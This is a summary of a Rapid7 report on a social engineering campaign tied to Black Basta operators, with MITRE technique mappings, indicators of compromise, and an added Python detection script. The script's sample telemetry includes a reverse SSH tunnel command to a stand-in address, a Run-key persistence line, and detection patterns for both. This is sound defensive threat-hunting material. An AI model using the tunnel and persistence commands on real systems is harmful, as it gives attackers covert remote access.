Ongoing Social Engineering Campaign Tied to Black Basta Ransomware Operators

Rapid7 identifies an ongoing social engineering campaign targeting MDR customers, where actors flood users with spam and then call them to offer remote-access help, enabling credential theft and persistence. While no ransomware was observed in these cases, some indicators align with the Black Basta operators based on OSINT and prior investigations. #BlackBasta #AnyDesk #QuickAssist

Keypoints

  • The campaign begins with a flood of spam emails—often newsletters from legitimate organizations—to overwhelm email protections.
  • Phone calls impersonating IT staff are used to socially engineer victims into granting remote access via AnyDesk or Quick Assist.
  • Once access is gained, the attackers download payloads and attempt to harvest credentials and establish persistence.
  • In at least one case, Cobalt Strike beacons were deployed to other assets, with no observed ransomware in Rapid7’s responses.
  • Initial access and persistence rely on batch scripts, SSH keys, and OpenSSH for Windows packaged as a renamed executable.
  • Forensic indicators include NetSupport and ScreenConnect tools, DLL side-loading, and indicators linked to the Black Basta operations.
  • Mitigations emphasize baselining RMM tools, application allowlisting, and user awareness of legitimate IT channels and social engineering attempts.

MITRE Techniques

  • [T1498] Network Denial of Service – “The threat actor overwhelms email protection solutions with spam.”
  • [T1566.004] Phishing: Spearphishing Voice – The threat actor calls impacted users and pretends to be a member of their organization’s IT team to gain remote access. “the threat actor calls impacted users posing as a member of their organization’s IT team reaching out to offer support for their email issues.”
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – “The threat actor executes batch script after establishing remote access to a user’s asset.”
  • [T1059.001] Command and Scripting Interpreter: PowerShell – “Batch scripts used by the threat actor execute certain commands via PowerShell.”
  • [T1547.001] Boot or Logon Autostart Execution: Run Keys / Startup Folder – “The threat actor creates a run key to execute a batch script via PowerShell, which then attempts to establish a reverse tunnel via SSH.”
  • [T1222.001] File and Directory Permissions Modification – “The threat actor uses cacls.exe via batch script to modify file permissions.”
  • [T1140] Deobfuscate/Decode Files or Information – “The threat actor encrypted several zip archive payloads with the password “qaz123”.”
  • [T1056.001] Input Capture: Keylogging – “The threat actor runs a batch script that records the user’s password via command line input.”
  • [T1033] System Owner/User Discovery – “The threat actor uses whoami.exe to evaluate if the impacted user is an administrator or not.”
  • [T1570] Lateral Tool Transfer – “Impacket was used to move payloads between compromised systems.”
  • [T1572] Protocol Tunneling – “An SSH reverse tunnel is used to provide the threat actor with persistent remote access.”
  • [T1574.002] DLL Side-loading – A modified 7z.DLL is side-loaded by 7zG.exe; the DLL XOR-decrypts the Cobalt Strike beacon and executes it. “The DLL was altered to include a function whose purpose was to XOR-decrypt the Cobalt Strike beacon using a hard-coded key and then execute the beacon.”
  • [T1041] Exfiltration: Exfiltration Over C2 Channel – Credentials are immediately exfiltrated to the threat actor’s server via SCP. “credentials are immediately exfiltrated to the threat actor’s server via a Secure Copy command (SCP).”
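The persistence chain above (Run key → PowerShell → batch script → renamed OpenSSH with a reverse tunnel, plus cacls.exe run from the script) is something a SOC can hunt for directly in endpoint telemetry. The following is an added triage example written for this summary; it is not code from Rapid7 or from the blog post. It runs over constructed, flattened Sysmon/EDR-style records (all hosts, paths, users and the 203.0.113.10 address are made up) and flags the three behaviours the technique list describes, without depending on any specific file hash.

```python
"""
Added example (not from the Rapid7 post): scan constructed endpoint telemetry
for the Run-key + PowerShell-launched batch script + SSH reverse tunnel
pattern and for cacls.exe spawned by a batch script (cmd.exe parent).
Every record below is constructed for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    record_id: int
    rule: str
    detail: str


# Constructed sample telemetry: each dict mimics a flattened registry-set or
# process-creation event as an EDR or Sysmon pipeline might emit it.
SAMPLE_EVENTS = [
    {"id": 1, "type": "registry_set",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\update",
     "value": r'powershell.exe -w hidden -c "C:\Users\alice\AppData\Roaming\up.bat"'},
    {"id": 2, "type": "process", "parent": "powershell.exe",
     "image": r"C:\Users\alice\AppData\Roaming\svc.exe",   # renamed OpenSSH client
     "cmdline": r"svc.exe -N -R 7000:localhost:3389 -i C:\Users\alice\.ssh\id_rsa u@203.0.113.10"},
    {"id": 3, "type": "process", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\cacls.exe",
     "cmdline": r"cacls.exe C:\Users\alice\AppData\Roaming\up.bat /E /P alice:F"},
    {"id": 4, "type": "process", "parent": "explorer.exe",   # benign admin SSH use
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": r"ssh.exe admin@gitserver.corp.example"},
    {"id": 5, "type": "registry_set",                        # benign Run key
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "value": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
PS_LAUNCHES_BATCH = re.compile(r"powershell(\.exe)?.*\.(bat|cmd)\b", re.I)
# OpenSSH reverse-forward syntax: -R <port>:<host>:<port>
REVERSE_TUNNEL = re.compile(r"(^|\s)-R\s+\d+:[\w.\-]+:\d+", re.I)


def image_name(ev):
    """Return the lower-cased file name of the process image."""
    return ev["image"].rsplit("\\", 1)[-1].lower()


def check_run_key(ev):
    """Run/RunOnce value that starts PowerShell pointed at a .bat/.cmd file."""
    if ev["type"] != "registry_set" or not RUN_KEY.search(ev["key"]):
        return None
    if PS_LAUNCHES_BATCH.search(ev["value"]):
        return Finding(ev["id"], "runkey_powershell_batch", ev["value"])
    return None


def check_reverse_tunnel(ev):
    """Any process using SSH reverse-forward switches; note if the binary is not ssh.exe."""
    if ev["type"] != "process" or not REVERSE_TUNNEL.search(ev["cmdline"]):
        return None
    renamed = image_name(ev) != "ssh.exe"
    detail = f"{ev['image']} (renamed client: {renamed})"
    return Finding(ev["id"], "ssh_reverse_tunnel", detail)


def check_cacls_from_batch(ev):
    """cacls.exe spawned by cmd.exe, i.e. typically from a batch script."""
    if ev["type"] != "process" or image_name(ev) != "cacls.exe":
        return None
    if ev.get("parent", "").lower() == "cmd.exe":
        return Finding(ev["id"], "cacls_from_batch", ev["cmdline"])
    return None


CHECKS = (check_run_key, check_reverse_tunnel, check_cacls_from_batch)


def scan(events):
    """Apply every check to every event; return the list of findings."""
    findings = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] record {f.record_id}: {f.detail}")
```

The renamed-client flag matters in practice: OpenSSH for Windows is a legitimate, signed binary, so allowlisting by publisher alone will not catch it, whereas an SSH client running from a user profile under a name other than ssh.exe is a baselining anomaly worth an alert. Events 4 and 5 are deliberately benign and produce no findings.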

Indicators of Compromise

  • [Network-based indicators (NBIs)] IPv4 Addresses and Domains – upd7[.]com, greekpool[.]com, and 12 more items
  • [Host-based indicators (HBIs)] Files and Keys – s.zip (SHA256: C18E7709866F8B1A271A54407973152BE1036AD3B57423101D7C3DA98664D108), id_rsa (SHA256: 59F1C5FE47C1733B84360A72E419A07315FBAE895DD23C1E32F1392E67313859), and 5 more items

Read more: https://blog.rapid7.com/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/